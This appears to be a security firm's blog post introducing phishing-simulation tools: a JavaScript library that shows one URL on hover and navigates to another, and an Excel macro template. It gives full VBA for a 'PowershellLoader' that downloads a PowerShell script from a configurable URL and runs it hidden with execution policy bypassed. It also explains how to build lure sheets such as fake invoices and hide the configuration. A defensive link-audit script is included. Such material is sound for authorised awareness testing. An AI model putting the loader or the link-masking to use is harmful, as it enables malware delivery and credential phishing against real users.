Phishing awareness exercises have become a common part of the larger security strategy for many organizations. Given the frequency at which major security events start with a user clicking a link or opening an attachment, it is reasonable that organizations want to reduce the likelihood of this sort of misstep. A typical exercise is some variant of coming up with a ruse, sending it to an email list of employees, and tracking who clicks the link.
On various occasions over the years, I have been called upon to develop a custom script or payload for the purpose of phishing in either the context of a phishing awareness campaign, or a red team exercise. Recently, a client expressed a need to do more than the typical link-tracking. Their organization felt that the danger that phishing posed to the organization was not being conveyed sufficiently to the users. Therefore, they were looking for ways to do a bit more, to better emphasize the risks without being overly intrusive. To support their efforts, I agreed to compile and open-source some resources patterned after things I have created in the past. This post will introduce two simple tools: an Excel template for attachment-based phishing, and a JavaScript library for masking malicious links. The resources discussed in this blog can be found at https://github.com/ProfessionallyEvil/tartar-sauce (this link is not a phish :-).
showgo.js - JavaScript Library for Hiding Malicious Links
Phishing awareness training often promotes hovering over a link to determine whether it points somewhere trustworthy. While this generally works in the context of emails (barring a few weaknesses, such as domain confusion based on punycode domains), it is fundamentally flawed in the context of a web page. The problem is that on a web page, JavaScript can manipulate the link behavior so that hovering shows one URL while navigating through the link goes to a different URL. To simulate this, I developed a JavaScript library that adds support for this misdirecting behavior on <a> tags. This library allows you to specify an alternate URL using a custom attribute, which changes the link's destination when it is navigated to through various methods.
Key Features
- Custom Attribute for Alternate URLs: The library adds a custom attribute to <a> tags, which specifies an alternate URL. This alternate URL is used when the link is clicked, accessed via the context menu, or copied and pasted.
- Hover Display: On hover, the link displays the original href attribute, making it appear legitimate to the user.
Example Usage
To use the library, follow these steps:
- Include the Library: Add the JavaScript library to your web page.
- Configure Links: Modify your <a> tags to include the custom attribute specifying the alternate URL. For example:
<a href="https://legitimate-site.com" data-go-url="https://malicious-site.com">Click here</a>
- Test the Links: Verify that the alternate URL is used when the link is navigated using different methods. Testing is crucial, as browser security features and extensions can affect the behavior of the script.
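The flip side of this technique is detection: a page or mail-gateway check can flag anchors whose hover destination and real destination disagree. The following is an added example (not code from showgo.js or the tartar-sauce repository) that audits anchor tags for the data-go-url attribute described above and, more generally, for visible URL text that does not match the href; the HTML sample and the base URL are constructed for illustration.

```javascript
// Added example, not part of the original post or library. The "data-go-url"
// attribute name comes from the post; SAMPLE_HTML is constructed here.
const SAMPLE_HTML = `
<p>Please review:</p>
<a href="https://legitimate-site.com" data-go-url="https://malicious-site.com">Click here</a>
<a href="https://intranet.example/portal">https://intranet.example/portal</a>
<a href="https://evil.example/login">https://intranet.example/login</a>
<a href="/relative/path" data-go-url="/relative/path">Same place</a>
`;

// Resolve a (possibly relative) URL against a base and return its lowercase
// host, or null if the value cannot be parsed at all.
function hostOf(value, base) {
  try { return new URL(value, base).host.toLowerCase(); } catch (e) { return null; }
}

// Extract <a ...>text</a> occurrences into {href, goUrl, text} records.
// A minimal regex parser is enough for an audit of static markup.
function extractAnchors(html) {
  const anchors = [];
  const tagRe = /<a\s+([^>]*)>([\s\S]*?)<\/a>/gi;
  const attrRe = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) attrs[a[1].toLowerCase()] = a[2] ?? a[3];
    anchors.push({ href: attrs.href ?? '', goUrl: attrs['data-go-url'] ?? null, text: m[2].trim() });
  }
  return anchors;
}

// Flag anchors whose hover/visible destination differs from the real one:
//  - a data-go-url attribute whose host differs from the href host, or
//  - link text that is itself a URL on a different host than the href.
function auditAnchors(html, base = 'https://page.example/') {
  const findings = [];
  for (const a of extractAnchors(html)) {
    const hrefHost = hostOf(a.href, base);
    if (a.goUrl !== null && hostOf(a.goUrl, base) !== hrefHost) {
      findings.push({ href: a.href, reason: 'data-go-url host differs from href', actual: a.goUrl });
    } else if (/^https?:\/\//i.test(a.text) && hostOf(a.text, base) !== hrefHost) {
      findings.push({ href: a.href, reason: 'visible URL text differs from href', actual: a.text });
    }
  }
  return findings;
}
```

Running `auditAnchors(SAMPLE_HTML)` reports two findings: the data-go-url redirect and the mismatched visible URL, while the same-host and relative links pass.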
Bootstrap_template.xlsm - An Excel Template for Attachment-Based Phishing
The problem with web-based phishing pages is that doing anything really impactful would require prerequisites that are not really appropriate for a user-awareness campaign. A truly malicious page would commonly rely on either exploiting unpatched flaws in the browser to attack the user’s machine, or exploiting flaws in other web apps. While it’s certainly fair to say that application flaws can expose an organization to significant risk when exploited via a malicious phishing campaign, these are not practical to leverage for user awareness exercises. This is mainly because if you are aware that these flaws are present, the priority should be remediating them. Leaving them in place to use them in a user awareness campaign would also mean leaving them available to any malicious actor, and doing so intentionally is completely irresponsible. Therefore, if we actually want some sort of benign exploit on the user’s system, attachments are a better option.
To facilitate this, I have developed an Excel file with various relatively benign, baked-in VBA payloads. This template includes a .config sheet for selecting and configuring the VBA payload that will run upon opening the file. For example, the configuration pictured below uses the NotepadOpen payload, which writes a .txt file containing the specified message to disk and opens it with NotePad.
Key Features
- Easy Configuration of Pre-built VBA Payloads: The template contains a .config worksheet where you can specify different payloads. These payloads can perform actions such as writing a text file to disk and opening it in Notepad, or opening a URL in the browser. You can easily hide the .config worksheet to prevent users from seeing the configuration.
- Customizable Worksheets: You can add additional worksheets to the Excel file to support your specific phishing ruse. These sheets can include convincing content designed to lure users into enabling macros.
Example Usage
To use the template, follow these steps:
- Add Custom Worksheets: Insert worksheets that align with your phishing scenario. These could include fake invoices, HR forms, or any other document type that would entice the target to enable macros.
- Configure the Payload: On the .config worksheet, select the desired payload. For example, you might configure the BrowserOpen payload to launch a hosted phishing awareness page in the user’s browser.
- Hide the Configuration Sheet: Once the payload is configured, hide the .config worksheet to prevent users from discovering the setup.
- Test the Payload: Ensure that the payload functions as expected in your target environment. Testing is crucial as various security controls, such as antivirus software and macro settings, can impact the success of the campaign.
Reminder: Always test the payloads thoroughly in a controlled environment to ensure they function correctly, and understand the potential impact of security controls on the exercise.
Extending the Spreadsheet's Payloads
With a little bit of VBA, it’s not difficult to add or modify the spreadsheet’s payloads. For example, while the open-sourced version does not have my PowershellLoader script, here’s the process for adding it.
Reminder: This payload downloads and executes a Powershell script, which can absolutely be used for evil. Plenty of malware loaders exist that already do this, so it’s not really anything new from that standpoint. But for the security person running a phishing campaign for the purposes of user awareness, remember that you want your users to speak up if they think they have opened or clicked something they shouldn’t have. If your payload is too intrusive, punitive, or embarrassing to your users, you risk deterring them from reporting future occurrences, which can negatively impact incident response. If you are going to use this, do so responsibly.
Adding the PowershellLoader:
1. Open the bootstrap_template.xlsm in Excel (no need to enable macros).
2. Use Alt+F11 (Option+F11 on a Mac keyboard) to open the VBA Editor.
3. In the Project navigation, right-click Modules and choose Insert > Module from the context menu.
4. You can use the Properties window to change the name from Module1 to something descriptive, like PowershellLoader.
5. Add the code:
Sub DownloadAndExecutePowerShellScript(URL As String, Msg As String)
    Dim DestinationFile As String
    Dim XMLHTTP As Object
    Dim OutputStream As Object

    ' Set the URL of the file to download
    ' URL = "http://192.168.2.11:8000/testfile.ps1"

    ' Set the destination file path (change this to your desired path)
    DestinationFile = ThisWorkbook.Path & "\testfile.ps1"

    ' Create the XMLHTTP object
    Set XMLHTTP = CreateObject("MSXML2.XMLHTTP")

    ' Send a GET request to the URL
    XMLHTTP.Open "GET", URL, False
    XMLHTTP.Send

    ' Check if the request was successful
    If XMLHTTP.Status = 200 Then
        ' Create the ADODB stream object
        Set OutputStream = CreateObject("ADODB.Stream")

        ' Configure the stream
        OutputStream.Type = 1 ' Binary
        OutputStream.Open
        OutputStream.Write XMLHTTP.responseBody
        OutputStream.SaveToFile DestinationFile, 2 ' Overwrite if the file exists
        OutputStream.Close

        ' Execute the PowerShell script
        Call ExecutePowerShellScript(DestinationFile)
        If Not Msg = "" Then
            MsgBox Msg
        End If
    Else
        MsgBox "Failed to download file. Status: " & XMLHTTP.Status
    End If

    ' Clean up
    Set XMLHTTP = Nothing
    Set OutputStream = Nothing
End Sub

Sub ExecutePowerShellScript(ScriptPath As String)
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run "powershell -ExecutionPolicy Bypass -File """ & ScriptPath & """", 0, False
    Set shell = Nothing
End Sub
6. In the Project navigation, expand Microsoft Excel Objects and open ThisWorkbook.
7. Add a branch to the Case statement so that a payload named PowerShell loader calls the DownloadAndExecutePowerShellScript subroutine.
Notice that I used the `Sheets(".config").Range("B2").Value` pattern to retrieve the URL and Message parameters from the .config sheet. The URL specifies where to download the script from, while the Message (if it is not empty) shows a pop-up after the execution has completed.
8. Finally, the Validation on the Payload list for the .config sheet needs to be updated. Expand the range used for validation by selecting the Payload cell (B1), opening Validation from the Data menu, and increasing the range of cells included.
9. Then add your payload name (matching the Case statement from step 7) to one of the empty cells you added to the range.
10. Done. You can now select your new payload and configure it with the options.
Importance of Testing and Security Controls
It's essential to remember that the effectiveness of these tools can be influenced by various security controls in your target environment. Endpoint protection software, macro settings, browser security features, and where a payload is served from, can all provide technical barriers to executing the macros in your attachment. Therefore, thorough testing on a properly configured desktop that meets organization baselines is critical to ensure that your simulations are realistic and effective.
Conclusion
The ruse, timing, targeting, and delivery of the phish are far more critical than the specifics of the payload. However, by open-sourcing these phishing awareness resources, I hope to provide ready-to-go examples that help organizations better convey the risks associated with phishing.
As always, security is an ongoing effort. Regularly update and refine your phishing campaigns to adapt to new threats and challenges. If you have any questions or need further assistance, feel free to reach out to our team. At the end of the day, we like to help you achieve your goal of becoming more secure, whether that’s through consulting, testing, education, or a combination of the three.